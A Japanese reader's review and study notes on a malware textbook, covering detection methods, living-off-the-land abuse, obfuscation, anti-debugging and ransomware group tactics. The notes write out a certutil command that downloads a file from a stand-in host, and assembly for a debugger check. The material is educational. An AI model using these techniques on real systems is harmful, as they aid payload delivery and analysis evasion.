マルウエアの教科書 増補改訂版 “超"基礎から高度な手口/解析のはじめ方まで完全網羅

実際の画面操作も満載で分かりやすく、更に良いというか最も感激したのは、専門用語がアレ何だっけ？という絶妙なタイミングで、欄外に注釈される。欄外の注釈くらいはよくある話だが、そうではなく、ある程度のページ感覚で複数回同じ語句を説明してくれるのだ。ページ数が多いと「初登場のページのみ注釈付き」という事が一般的だが、それだと何度も何度も探し回らないといけない。 マルウェアの話だ。仕事でお世話になっているある事務所の高齢者のパソコンがウイルスにかかり、私にSOS。またいやらしいページ見たでしょうと牧歌的な日常シーンはさておき、こちらには直せるスキルなし。とにかく敵を知れとばかりに読む。結局違う人に任せたが、勉強になった。 ここ数年、マルウエアに関連する事件が頻繁し、一般の人々にもマルウエアが身近なものに。身代金目当てのランサムウエアは、私も使うGARMINを狙い機能不全を起こしていた事を思い出す2020年以降はEmotetと呼ばれるマルウエアが流行し世界各地で感染が拡大。そう、敵の正体はこいつであった。 マルウエアは容易に作成できると本書はいう。内容は引用しないが、読んでいるとそんなものかなーという感じだ。こういう本は読むだけではなく、手を動かしながら読むもの。そもそも作成する気も直す気もない私は、単に好奇心だけでページを捲るので、身に付かず。

sysinternals autoruns でピンク色の不明な発行元ソフトのチェック マルウェア検知の方法 シグネチャー検知：マルウェアの中身のバイナリの複数のバイナリ列を特徴点として検知 ヒューリスティック検知：マルウェアの中身や挙動を定義し合致すればマルウェアと判定、静的(動かさない)と動的(仮想的に動かす) YARAルールによるシグネチャ検知 yara32.exe YARA for Visual Studio Code Snatch セーフモードでデータを暗号化するランサムウェア SuperBackupManというサービスを登録 PowerShell で Get-Variableという引数を追加するとGet-Variable.exeを起動しようとする LOL攻撃 標準の正規プログラムを悪用する攻撃 rundll32.exe format.com wlmdr.exe bitsadmin.exe certreq.exe ftp.exe psr.exe certutil.exe -urlcache -split -f https://aaaa.org/eicar.com カレントフォルダにダウンロード formatc: /FS test Windowsシステムフォルダの utest.dll を実行しようとする パッキングと難読化処理 CFF＝順次処理を横並びの条件分岐と繰り返し処理に置き換える、平坦化 API hashing 呼び出すAPIの名前をハッシュ関数を用いて難読化する WindowsAPIはPE解析ツールにより容易に調べることができる 静的リンクと違い動的リンクではGetProcAddressでAPIを提供するアドレスを取得できる Ekansランサムウェア mds.honda.comの名前解決で内部アドレスを返したときのみ活動開始 オーダーメイド型ランサムウェア LockBit2.0 プリンターを使用して脅迫文を9999枚印刷する 静的解析と動的解析を妨害、自身を完全削除 UACパイパスで管理者権限を取得 ロシア言語圏だと感染しない ロシアのハッカーフォーラムで攻撃グループContiの攻撃マニュアルが流出 首謀者とアフィリエイトと呼ばれる攻撃の実働部隊で活動で得た金銭を分け合う セキュリティ診断ツールCobalt Strikeを悪用した攻撃方法 FileZillaやPuttyの悪用、プロキシツールngrokを使ったRPDの遠隔操作方法 RcloneによるオンラインストレージサービスMegaへのアップロード 初期アクセスブローカー IAB 不正に取得した被害組織へのアクセス情報をランサム攻撃実働部隊のアフィリエイトに提供する ProcessSpanwnControl プロセスの起動を常時監視する HollowsHunter、pe-sieve マルウェア検出のためのフリーツール OllyDbg フリーのデバッガー IsDebuggerPresent KernelBase.dllの中で実装 EXEファイルがメリー展開される際、PEBとTEBという構造体が入ってる　PEBはプロセス、TEDはスレッド PEBの中にプロセスが現在デバックされてるかどうかを示すBeingDebuggedの値を返している 32bitの場合TEBはFSレジスタに格納され、その銭湯から0x30の場所 fs:[30] にPEBのアドレスが格納 PEBアドレスから0x02にBeingDebuggedの値 MOV EAX,DWORD PTR FS:[30] MOVZX EAX,BYTE PTR DS:[EAX+2] うさみハリケーン XNTSV